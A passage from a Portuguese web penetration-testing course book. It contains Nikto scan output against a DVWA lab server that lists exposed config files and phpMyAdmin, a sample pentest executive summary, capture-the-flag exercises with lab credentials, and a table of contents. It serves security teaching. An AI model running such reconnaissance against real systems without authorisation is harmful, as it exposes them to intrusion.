- Nikto v2.03/2.04
------------------------------------------------------------------------
+ Target IP: 192.168.213.200
+ Target Hostname: dvwa.esr.rnp.br
+ Target Port: 80
+ Start Time: 2011-09-19 11:18:10
-------------------------------------------------------------------------
483
+ Server: Apache/2.2.17 (Fedora)
- Root page / redirects to: login.php
- /robots.txt - contains 1 disallow entry which should be

manually viewed. (GET)
+ OSVDB-0: Retrieved X-Powered-By header: PHP/5.3.6
+ OSVDB-0: ETag header found on server, inode: 416193, size: 26,

mtime: 0x481e2fb16a580
+ OSVDB-0: GET /config/ : Configuration information may be

available remotely.
+ OSVDB-0: GET /php.ini : This file should not be available

through the web interface.
+ OSVDB-877: TRACE / : TRACE option appears to allow XSS or

credential theft. See http://www.cgisecurity.com/whitehat-mirror/
WhitePaper_screen.pdf for details
+ OSVDB-12184: GET /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-

4C7B08C10000 : PHP reveals potentially sensitive information via
certain HTTP requests which contain specific QUERY strings.
+ OSVDB-3268: GET /config/ : Directory indexing is enabled: /

config/
+ OSVDB-3092: GET /phpmyadmin/ : phpMyAdmin is for managing MySQL

databases, and should be protected or limited to authorized
hosts.
+ OSVDB-3092: GET /phpMyAdmin/ : phpMyAdmin is for managing MySQL

databases, and should be protected or limited to authorized
hosts.
+ OSVDB-3268: GET /icons/ : Directory indexing is enabled: /icons
+ OSVDB-3268: GET /docs/ : Directory indexing is enabled: /docs
+ OSVDB-3092: GET /CHANGELOG.txt : A changelog was found.
+ OSVDB-3233: GET /icons/README : Apache default file found.
+ 3577 items checked: 14 item(s) reported on remote host
+ End Time: 2011-09-19 11:18:19 (9 seconds)

-------------------------------------------------------------------------
+ 1 host(s) tested
Test Options: -host dvwa.esr.rnp.br
-------------------------------------------------------------------------
484
Exemplo de sumrio executivo
1. Resumo
Este relatrio descreve os resultados do teste externo de invaso da aplicao DVWA, reali-
zado no perodo de 05/01/2011 a 14/01/2011. Diversas vulnerabilidades foram descobertas
ao longo do processo, sendo algumas delas extremamente crticas, por possibilitarem a
extrao completa da base de dados, que se encontra em claro, apesar de conter informa-
es sigilosas.
Nome do Fulano de Tal

responsvel:
e-mail: fulano.tal@esr.rnp.br Fone: (21) 2275-5578
Rua Lauro Mller, 455, 4 andar Botafogo

Endereo:
CEP: 22290-160 Rio de Janeiro, RJ
Faz parte do escopo do presente trabalho uma nica aplicao web, chamada de DVWA.
3.1.DVWA
A aplicao DVWA, criada pela RandomStorm, tem por objetivo permitir que aquelas
pessoas interessadas em aprender sobre vulnerabilidades em aplicaes web possam
realizar testes, em um ambiente controlado, sem cometer infraes legais. Como um
sistema de cdigo aberto, pode-se analisar o cdigo vulnervel, para entender o motivo
de um dado problema ocorrer.
4. Sntese dos resultados
Como resultado do trabalho de teste de invaso da aplicao DVWA, descobriu-se um total

de 21 vulnerabilidades, cujas criticidades, representadas pelo escore de base (CVSS), esto
resumidas abaixo no grfico ilustrado. importante observar que, quanto maior o escore de

base, mais grave a vulnerabilidade.
12
10
Quantidade
2 4 6 8 10
Escore de Base
485
O seguinte grfico, por sua vez, lista, por classe de vulnerabilidade encontrada, o escore de
base (CVSS) e o nmero total de ocorrncias.
5. Diagnstico geral
A aplicao DVWA possui vulnerabilidades extremamente graves, as quais permitem, entre

outras coisas, comprometer totalmente a confidencialidade, a integridade e a disponibilidade
das informaes que manipula, alm de possibilitar ataques entre usurios. De modo geral,
necessrio que a aplicao seja reestruturada completamente, a comear pela topologia de
rede adotada, que expe o banco de dados diretamente internet. Adicionalmente, convm
instalar um web application firewall, para barrar, pelo menos, os atacantes menos sofisticados.
486
Atividade 1 Teste da aplicao Vicnum
Esta atividade tem por objetivo servir de aquecimento para o exerccio de captura da ban-
deira, por meio da explorao de uma aplicao mais simples. Para inici-la, carregue as
mquinas virtuais do aluno e do servidor (Fedora) e execute os roteiros na primeira delas.
O propsito desta atividade descobrir as vulnerabilidades na aplicao Vicnum, que per-

mitem que usurios trapaceiem no jogo e obtenham um resultado perfeito.
2. Acesse http://vicnum.esr.rnp.br/
3. Entenda como funciona o jogo Vicnum, participando de algumas rodadas.
4. Execute o teste de invaso completo, para identificar as vulnerabilidades que permitem

que alguns usurios trapaceiem.
Atividade 2 Capture a bandeira

O objetivo desta atividade exercitar todo o conhecimento adquirido neste curso, per-
mitindo que o leitor realize um teste de invaso completo, em uma aplicao contendo
diversos tipos de vulnerabilidades:
1 Acesso direto a recursos (1x).

1 Cross-site scripting (5x).
1 Exposio de arquivos do sistema operacional (1x).
1 Falha em lgica de negcio (1x).
1 Identificadores de sesso previsveis (1x).
1 Incluso de arquivos (1x).
1 Injeo de comandos (1x).
1 Injeo de SQL (2x).
1 Manipulao de parmetros (1x).
1 Navegao de diretrios (1x).
1 Revelao de informaes (1x).
1 Senha fraca (1x).

1 Transporte inseguro de informaes (2x).
Para acessar a aplicao, digite a seguinte URL em um navegador web:
http://wackopicko.esr.rnp.br/
487
Algumas contas pr-cadastradas, que podem ser usadas, incluem:
1 scanner1/scanner1.
1 scanner2/scanner2.
1 bryce/bryce.
A partir dessas informaes, aplique a metodologia apresentada no Captulo 2, baseada nas

etapas de reconhecimento, mapeamento, descoberta de vulnerabilidades e explorao, e
sucesso na realizao da atividade!
488
Bibliografia 10
1 AUGER, Robert et al. WASC Threat Classification Version 2.00. Web Application Security
Consortium, 2010.
1 GORDEYCHIK, Sergey, GROSSMAN, Jeremiah, KHERA, Mandeep, LANTINGA, Matt,

WYSOPAL, Chris, ENG, Chris, SHAH, Shreeraj, LEE, Lawson, MURRAY, Campbell e EVTEEV,
Dmitry. Web Application Security Statistics 2008. Web Application Security Consortium, 2008.
1 MELL, Peter, SCARFONE, Karen e ROMANOSKY, Sasha. CVSS A Complete Guide to the
Common Vulnerability Scoring System Version 2.0. FIRST, 2007.

489
Um teste de invaso, tambm chamado de teste de pene-
LIVRO DE APOIO AO CURSO
segurana de um ambiente, plataforma ou sistema, por

meio da simulao de ataques reais explorando as vulne-
-
dura de vulnerabilidades, que recorre ao simples uso de
ferramentas automatizadas, pentest um processo cclico
que depende principalmente do conhecimento do auditor
de segurana que o realiza. O curso introduz as principais
tcnicas que podem ser empregadas.
Este livro inclui os roteiros das atividades prticas e o con-
tedo dos slides apresentados em sala de aula, apoiando
suas organizaes ou localidades de origem.
ISBN 978-85-63630-17-9
9 788563 630179
490

Teste de Invasão de Aplicações Web

Transféré par

Informations du document

Copyright

Formats disponibles

Partager ce document

Partager ou intégrer le document

Options de partage

Avez-vous trouvé ce document utile ?

Ce contenu est-il inapproprié ?

Droits d'auteur :

Formats disponibles

Teste de Invasão de Aplicações Web

Transféré par

Droits d'auteur :

Formats disponibles

Teste de Invaso

Diretor de Servios e Solues

Escola Superior de Redes

Coordenao Acadmica de Segurana e Governana de TI

Equipe ESR (em ordem alfabtica)

Capa, projeto visual e diagramao

Dados Internacionais de Catalogao na Publicao (CIP)

U91s UTO, Nelson.

1. Computadores Medidas de segurana. 2. Hackers. 3. Software Manuteno.

1. Segurana em aplicaes web

Exerccio de nivelamento 1 Desenvolvimento de software3

Ciclo de desenvolvimento de software seguro3

Exerccio de fixao 1 Atividades de segurana5

Arquiteturas e tecnologias de aplicaes web6

Exerccio de nivelamento 2 Requisitos de segurana8

Funes de hash criptogrficas11

Protocolos SSL e TLS13

Exerccio de fixao 2 Segurana da informao15

Reviso dos protocolos HTTP e HTTPS16

Exerccio de fixao 3 Protocolo HTTP20

Roteiro de Atividades 123

Atividade 1 Arquiteturas e tecnologias de aplicaes web23

Atividade 2 Mecanismos criptogrficos23

Exerccio de nivelamento 1 Teste de invaso38

Metodologia de teste de invaso39

Exerccio de fixao 1 Etapas de um teste de invaso42

Varredores de portas e servios47

Exerccio de fixao 2 Tipos de ferramentas50

Levantamento de informaes em fontes pblicas52

Identificao de sistema operacional, servios e portas55

Identificao do servidor web56

Levantamento dos mtodos suportados pelos servidores web59

Deteco de hosts virtuais59

Descoberta de arquivos e diretrios60

Exerccio de fixao 3 Fase de reconhecimento62

Cpia das pginas e recursos da aplicao62

Identificao dos pontos de entrada de informao63

Relacionamento com as informaes de reconhecimento64

Exerccio de nivelamento 2 Validao unilateral64

Explorao de controles no lado cliente65

Exerccio de fixao 4 Segurana de controles67

Roteiro de Atividades 269

Atividade 1 Ferramentas bsicas69

Atividade 4 Descoberta e explorao de vulnerabilidades82

3. Teste do mecanismo de autenticao

Exerccio de fixao 1 Autenticao de usurio88

Exerccio de nivelamento 1 Autenticao de entidades88

Tecnologias de autenticao empregadas em aplicaes web89

Exerccio de nivelamento 2 Vulnerabilidades 94

Descoberta de vulnerabilidades e explorao94

Uso de informaes obtidas nas fases de reconhecimento e mapeamento95

Usurio e senha padronizados97

Enumerao de identificadores de usurios98

Mecanismo vulnervel de recuperao de senhas101

Funcionalidade Lembrar usurio103

Transporte inseguro de credenciais de acesso103

Falhas na implementao do mecanismo104

Mecanismo vulnervel de troca de senhas107

Autenticao com mltiplos fatores108

Ataque de fora bruta109

Ataque contra senhas armazenadas114

Inexistncia de poltica de senhas forte117

Negao de servio direcionada a usurios119

Exerccio de fixao 2 Vulnerabilidades em mecanismos de autenticao120